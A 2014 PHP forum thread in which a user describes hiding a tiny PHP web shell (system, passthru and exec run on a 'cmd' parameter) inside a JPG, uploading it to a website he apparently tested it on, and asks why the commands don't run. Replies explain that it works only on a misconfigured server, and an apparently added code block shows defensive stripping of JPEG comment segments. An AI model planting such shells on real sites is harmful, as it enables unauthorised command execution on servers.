PHP Developers Network
http://forums.devnetwork.net/

is it impossible???
http://forums.devnetwork.net/viewtopic.php?f=39&t=139794

Author:  M0TRIX [ Thu Jun 19, 2014 7:49 am ]
Post subject:  is it impossible???

hello

follow the steps:

1_download the edjpgcom.exe program.

2_drag the jpg file into the edjpgcom program, then you can put your code into the jpg file

3_put this code into it:

 <?PHP
system($cmd);
passthru($cmd);
exec($cmd);
?>



4_upload the jpg file.

5_run it like this: image.jpg?cmd=ls

do you think it is possible to run commands with this method??? or with other image file extensions like png, gif, etc.?

Author:  Weirdan [ Thu Jun 19, 2014 12:19 pm ]
Post subject:  Re: is it impossible???

That's possible, however only if the webserver is misconfigured to process image files through php. Another exploit vector would be exploiting attacker-controlled includes, but if that's possible it would itself be a security issue.
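
The reply above says embedded bytes are inert unless the server hands the image to PHP; an upload handler can still strip them as defence in depth. The following is an added example, not part of the thread: it assumes the text is stored in a JPEG comment (COM) segment, uses a hypothetical helper name `strip_jpeg_comments`, and runs on constructed sample bytes.

```php
<?php
// Added example, not code from the thread. Assumption: the injected text sits
// in a JPEG COM (comment) segment, marker 0xFFFE.
/** Drop every COM segment from a JPEG and report whether any of them held a
 *  PHP open tag. Returns [string $cleanBytes, bool $flagged]. */
function strip_jpeg_comments(string $jpeg): array
{
    if (strncmp($jpeg, "\xFF\xD8", 2) !== 0) {
        throw new InvalidArgumentException('not a JPEG: missing SOI marker');
    }
    $out = "\xFF\xD8";
    $flagged = false;
    $pos = 2;
    $len = strlen($jpeg);
    while ($pos + 4 <= $len) {
        if ($jpeg[$pos] !== "\xFF") {
            throw new InvalidArgumentException("bad marker at offset $pos");
        }
        $marker = ord($jpeg[$pos + 1]);
        if ($marker === 0xDA) {
            // Start of scan: compressed image data follows, copy it unchanged.
            return [$out . substr($jpeg, $pos), $flagged];
        }
        // Big-endian segment length; it counts its own two bytes.
        $segLen = unpack('n', substr($jpeg, $pos + 2, 2))[1];
        if ($segLen < 2 || $pos + 2 + $segLen > $len) {
            throw new InvalidArgumentException("truncated segment at offset $pos");
        }
        $segment = substr($jpeg, $pos, 2 + $segLen);
        if ($marker === 0xFE) {
            $flagged = $flagged || strpos($segment, '<?') !== false;
        } else {
            $out .= $segment;
        }
        $pos += 2 + $segLen;
    }
    throw new InvalidArgumentException('no start-of-scan marker found');
}

// Constructed sample: SOI, APP0, one COM segment with a harmless tag, SOS, EOI.
$comment = '<?php /* constructed placeholder */ ?>';
$sample  = "\xFF\xD8"
    . "\xFF\xE0" . pack('n', 7) . "JFIF\0"
    . "\xFF\xFE" . pack('n', strlen($comment) + 2) . $comment
    . "\xFF\xDA" . "\x00\x02" . "\x11\x22" . "\xFF\xD9";
[$clean, $flagged] = strip_jpeg_comments($sample);
var_dump($flagged, strpos($clean, '<?php') === false);
```

Text placed in other metadata segments or after the end-of-image marker is not covered here; re-encoding the upload with an image library discards those as well.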

Author:  M0TRIX [ Thu Jun 19, 2014 5:00 pm ]
Post subject:  Re: is it impossible???

i've tested it on a website. i just see the picture!!! but no command works!! why???? there is php code in it. it should work

i put <php and ?> characters in it. the webserver should recognize it as a php file. huh??

is there any way to run our command with the picture??

so what is the "edjpgcom.exe" program (first post) for?

Author:  Celauran [ Thu Jun 19, 2014 6:47 pm ]
Post subject:  Re: is it impossible???

What are you trying to do here? Having shell_exec and/or exec enabled on a server is a pretty terrible idea.

All times are UTC - 5 hours